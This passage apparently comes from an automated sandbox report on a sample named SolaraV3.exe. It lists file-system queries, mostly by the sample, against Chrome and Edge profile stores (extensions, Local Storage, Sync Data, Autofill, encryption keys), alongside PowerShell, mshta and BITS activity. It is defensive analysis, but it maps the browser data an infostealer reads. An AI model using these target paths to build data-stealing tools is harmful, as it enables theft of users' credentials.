              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
